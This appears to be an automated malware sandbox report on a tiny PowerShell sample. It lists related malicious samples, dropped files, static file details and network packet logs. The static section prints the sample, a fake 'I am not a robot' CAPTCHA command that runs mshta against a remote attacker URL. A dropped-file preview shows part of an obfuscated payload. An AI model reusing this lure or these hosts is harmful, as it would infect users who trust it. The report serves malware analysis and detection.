                                                    U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 104.21.38.84
                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                    • 162.159.128.233
                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.48.1
                                                    https://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                    • 104.16.123.96
                                                    decrypt.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.16.1
                                                    decrypt.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.16.1
                                                    FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                    • 104.16.123.96
                                                    CLOUDFLARENETUShttps://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                    • 188.114.97.3
                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.30.45
                                                    U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 104.21.38.84
                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                    • 162.159.128.233
                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.48.1
                                                    https://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdfGet hashmaliciousUnknownBrowse
                                                    • 104.16.123.96
                                                    decrypt.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.16.1
                                                    decrypt.exeGet hashmaliciousUnknownBrowse
                                                    • 104.21.16.1
                                                    FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                    • 104.16.123.96

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eLet's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    YJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
                                                    • 188.114.97.3
                                                    Etqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 188.114.97.3
                                                    OPRfEWLTto.jsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    over.ps1Get hashmaliciousVidarBrowse
                                                    • 188.114.97.3
                                                    http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                    • 188.114.97.3
                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                    • 188.114.97.3
                                                    Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                    • 188.114.97.3
                                                    37f463bf4616ecd445d4a1937da06e19setup.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    over.ps1Get hashmaliciousVidarBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    MatAugust.exeGet hashmaliciousVidarBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62
                                                    IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    • 172.67.144.62

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1310720
                                                    Entropy (8bit):1.3073369134115063
                                                    Encrypted:false
                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrB:KooCEYhgYEL0In
                                                    MD5:23AD15F0339A50152466277CB1FA31D7
                                                    SHA1:69EE9AD38927D207C3AC57C350722A0208852EB6
                                                    SHA-256:E6AEB72CF12EF8FB75E1ACAD9AFAF558F3BF5E873C6A4C16A9581A60F42A31B9
                                                    SHA-512:D31A9B5D5412B811B4D5B15D88E661B1237BE9813E2BE6EADC484ECA9921F06D5F8F381B241A673FBE5EF8684EC277FCB1614142EC3C4A6E7D2B1F9052420882
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x09f936ef, page size 16384, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):1310720
                                                    Entropy (8bit):0.42211189259761683
                                                    Encrypted:false
                                                    SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                    MD5:A1885FA4AD3BB8A6230674E85313E2DA
                                                    SHA1:314B3FC61F6328D6A609D9CA6442247A92861528
                                                    SHA-256:AB015436925D1705DB2BD5C747C2855F9F7B9A3FA1C864AB51210EC5D047287C
                                                    SHA-512:44B312A56C14BE3DAD8EED15184DCE4DDBD0B7DB553757BF2ADB63C3F4541E219A832EB32A286FA822A4349F7988070CD43D3B29A58E5698C17B435030E9B5AE
                                                    Malicious:false
                                                    Preview:..6.... .......A.......X\...;...{......................0.!..........{A..$...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................'....$...}..................k.J.$...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):16384
                                                    Entropy (8bit):0.07664017863223768
                                                    Encrypted:false
                                                    SSDEEP:3:2UYeT0Wagejjn13a/QXkRs/YllcVO/lnlZMxZNQl:NzT07bj53qQ0RBOewk
                                                    MD5:974E4DB9DBBB62666752944D89F8383E
                                                    SHA1:D7CEAAEAFD8E44C8AEAD0EA6D246BE886CADB0CC
                                                    SHA-256:A58C09148A788B9B1326C7041A0ADE39BA272AF35932389033AFFCB39AADAAE8
                                                    SHA-512:628D42C97994D319E2A42B7FE2D60F36047746AB4ED6B8655330ADF644FE2605E67B256D1C4A952470AE11D66CC90CCE855F655A51FEE8367C2CAD93C59AF690
                                                    Malicious:false
                                                    Preview:X.+H.....................................;...{...$...}.......{A..............{A......{A..........{A]................k.J.$...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Poket[1].mp4

                                                    Download File
                                                    Process:C:\Windows\System32\mshta.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1645681
                                                    Entropy (8bit):5.577136957505929
                                                    Encrypted:false
                                                    SSDEEP:6144:7l5Aka0fKZdWkSflCSzBeJ2IbRGeYeyWfpYBe04PebeYj4BqrrvDqHHU11kYYTGm:4j
                                                    MD5:9FB3DB7B334F385701B3C88D63B7E5EE
                                                    SHA1:D901CD79292CF0F31DB2F1C83A62460E1F6A1EF5
                                                    SHA-256:658D84007977B9BCBAC196D09EC012E15DBA6D71F026613BB08E3A0EC4ACEEF8
                                                    SHA-512:25A2CF3ED7F5B11CEB936C3EBD0696C5D4A63837DC2B1D90D9FA772F852D673C98D5BA8083B63F1BD9212DB4F8059167248B7242CBD7C785E3941B8E08AB780C
                                                    Malicious:false
                                                    Preview:66K75S6ei63K74s69p6fE6eC20L41W7aZ43l57c6dJ28M69A6ch63Y4dO49J63q29q7bc76w61f72s20i63g4aX76s78a50A3dk20W27y27c3bO66E6fW72v20W28K76d61z72I20A4fA6bD62w4ec70a56E20H3ds20Q30U3bp4fm6be62z4eH70Y56e20T3cv20Y69B6cF63K4dj49l63d2eB6cT65n6eg67M74d68n3bf20r4ff6bk62u4eS70W56s2br2bG29e7bm76b61Z72W20n48x63f57K43D47j20y3du20s53M74q72w69C6eo67E2ej66I72M6fz6dz43I68c61o72k43B6fZ64g65J28z69g6cw63K4dD49f63f5bp4fA6bC62Z4eD70g56w5dm20X2dE20V33U39D35n29W3bW63a4ac76a78O50L20J3dv20I63e4aD76p78v50M20P2bg20t48W63J57P43i47G7dm72v65S74L75q72R6ef20g63E4ac76W78d50J7dW3bi76d61R72U20g63F4at76v78z50r20B3dZ20H41X7ac43y57u6dX28n5bQ35n30g37H2cD35U30r36P2cb35Z31b34T2cR34C39t36y2cP35F30o39j2cd35M31r30w2cb34J39Q39J2cI34E39G36h2cy35p30t33j2cB35V30O33z2co34q34R31V2cY34Y39k36W2cO35Z31M35s2cG34o39K36D2cv34k32g37t2cE34i34G30X2cS35u31U34b2cJ34J32w37u2cr34o34u34n2cu34V32Y37D2cZ34t34v30j2cs34O39b36K2cf35p30o37R2cp34U32v37F2cj34u38D30e2cD35I30N35E2cc35S30B39R2ct34X39J36Z2cM35d31U30K2cn35X31f31E2cS35K30w39T2cV35e30E30W2ct34o39D34A2cS35t3

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):12584
                                                    Entropy (8bit):4.905392021155998
                                                    Encrypted:false
                                                    SSDEEP:384:brib4Z1VoGIpN6KQkj2qkjh4iUxCdjT6Ypib47:bL1V3IpNBQkj2Ph4iUxCdX6YP
                                                    MD5:3A797BB89F31B1A6A41B9531C27450B4
                                                    SHA1:F88C7BA1622656BA69E2041EED645AE4182A06B4
                                                    SHA-256:09DB28EA3982D7E071A8383057146C78F2C71D9FED8CCEC309DE9E1CA01108A4
                                                    SHA-512:C09328F9B63B831A6906AFE695581083F5AE3858825E5A8AB6E7698F604C25C19338CB80E32D0F0756C875DE8F20CD5A577C1B967D9B1513CF39832D4AA7F8E5
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1564
                                                    Entropy (8bit):5.43409546119742
                                                    Encrypted:false
                                                    SSDEEP:48:aWSU4Yymp+gs4RIoU99tlNWR8I75e2+9FPX4:aLHYvvsIfAXWN7c24Ff4
                                                    MD5:E8F1577E5CB13D946AD997DDE8F24B75
                                                    SHA1:94DBF51FF7E78DE79AD193AEB1245BD6FFAE5E4A
                                                    SHA-256:4CC1D19F2F72B18F81188BB104A5322576268E29CA92232C303FEF57460C8F3E
                                                    SHA-512:046BE0731B97EDEEB1D0DA3EB7B4C51267F37AC0AE7BF640B52D345594293AB65DF48F5F537EFE7A1C339CD7AA3BFCD88EB322E1B1470A61FFA59C80618C8BF7
                                                    Malicious:false
                                                    Preview:@...e........... ...............................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwbqoy3r.y0a.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxcvrnjd.py2.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofhpiqij.kmq.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrilgxf2.3zg.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rx3j10ix.n01.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjpobrkd.zfz.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6221
                                                    Entropy (8bit):3.727710574127003
                                                    Encrypted:false
                                                    SSDEEP:48:TjF8FG2LPr3C4U28njQukvhkvklCywPmdgSCGls5SogZoGASCGl15SogZoy1:Nj233CxHnNkvhkvCCtPSCGPHMSCG4HN
                                                    MD5:144CABC9DB5F793B20CB5803FE368D13
                                                    SHA1:8DFDB64FD2FE3F5F6405C5ABD8CA75C1E65BFF72
                                                    SHA-256:83E881CA00D2F308FA484B243A9A5A7ACB321763B800C71EFCF56C7E5B265B07
                                                    SHA-512:B54A536DC920CFA56A019443F633F60BAF1AE04C4D589B430218BBF13CD80703E4AAB4168E74172046E4BD6AC55B40FDA54988C415176DB16970440513611B50
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...-/.v........\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.........\...r*..\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z{$...........................%..A.p.p.D.a.t.a...B.V.1.....!Zy$..Roaming.@......CW.^!Zy$...........................A.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^!Z}$..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^!Z}$....Q...........

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M65NKSR7LXJRSU27HQQD.temp

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6221
                                                    Entropy (8bit):3.727710574127003
                                                    Encrypted:false
                                                    SSDEEP:48:TjF8FG2LPr3C4U28njQukvhkvklCywPmdgSCGls5SogZoGASCGl15SogZoy1:Nj233CxHnNkvhkvCCtPSCGPHMSCG4HN
                                                    MD5:144CABC9DB5F793B20CB5803FE368D13
                                                    SHA1:8DFDB64FD2FE3F5F6405C5ABD8CA75C1E65BFF72
                                                    SHA-256:83E881CA00D2F308FA484B243A9A5A7ACB321763B800C71EFCF56C7E5B265B07
                                                    SHA-512:B54A536DC920CFA56A019443F633F60BAF1AE04C4D589B430218BBF13CD80703E4AAB4168E74172046E4BD6AC55B40FDA54988C415176DB16970440513611B50
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...-/.v........\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.........\...r*..\......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^!Z{$...........................%..A.p.p.D.a.t.a...B.V.1.....!Zy$..Roaming.@......CW.^!Zy$...........................A.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^!Z}$..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^!Z}$....Q...........

                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                    Static File Info

                                                    General

                                                    File type:Unicode text, UTF-8 text, with no line terminators
                                                    Entropy (8bit):5.310404947527902
                                                    TrID:
                                                      File name:1.ps1
                                                      File size:143 bytes
                                                      MD5:1ca2c37d699c31038a935df80666343b
                                                      SHA1:845e2fc0ff86d9e1b40f6d3536a636fdeaa4a3d4
                                                      SHA256:be8ec04111bf65a104b306bc679f9c467e7bbe1723bb8eeaa23be1d0ba84c6dd
                                                      SHA512:455e808a2b4801b3ba8b5639d5ab35c544f9ff33f87fdc3f244d29203602331a4f8e5ffaeb67b10cb29e6cf2081a1b8c54e17bf2f8813f3e558e59a9382047b2
                                                      SSDEEP:3:rN6e/ITPJMiaefRBsho3SHEVX95t+RbqRF4I1yMQRWLQn:Z6e2BOefshQ3Xb0IMPyQ
                                                      TLSH:8FC02B73040410391E3363D0425129E00F3A0314D88961CF2D7E0474824F2F3C713E10
                                                      File Content Preview:mshta https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d # ... ''I am not a robot - reCAPTCHA Verification ID: 4885''

                                                      File Icon

                                                      Icon Hash:3270d6baae77db44

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 1, 2025 05:35:59.460694075 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:35:59.460736990 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:35:59.460810900 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:35:59.473858118 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:35:59.473881960 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.156857014 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.156936884 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:00.221250057 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:00.221275091 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.221489906 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.221545935 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:00.224175930 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:00.271328926 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.791820049 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.791883945 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.791973114 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:00.794188976 CET49730443192.168.2.4188.114.97.3
                                                      Jan 1, 2025 05:36:00.794208050 CET44349730188.114.97.3192.168.2.4
                                                      Jan 1, 2025 05:36:00.809817076 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:00.809869051 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:00.810058117 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:00.810436010 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:00.810452938 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.301028967 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.301105976 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.306360960 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.306370020 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.306680918 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.306745052 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.307118893 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.351330996 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.583880901 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.583926916 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.583964109 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.583992958 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.583997965 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.584013939 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.584028959 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.584038973 CET49731443192.168.2.4172.67.144.62
